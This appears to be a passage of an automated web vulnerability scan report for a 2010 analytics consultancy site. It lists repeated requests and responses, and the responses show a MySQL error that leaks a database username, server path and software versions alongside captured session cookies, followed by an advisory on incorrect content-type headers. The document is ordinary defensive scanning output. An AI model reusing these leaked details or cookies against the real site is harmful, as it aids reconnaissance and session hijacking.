apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:40:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/17-viget-labs-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:43:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:58:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:43:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/36-other-ga-blogs.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:33:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/37-ga-support-forums.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:33:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 07:51:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/healthcheck/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:26:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:12:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /urchin/urchin-hosting.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:28:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.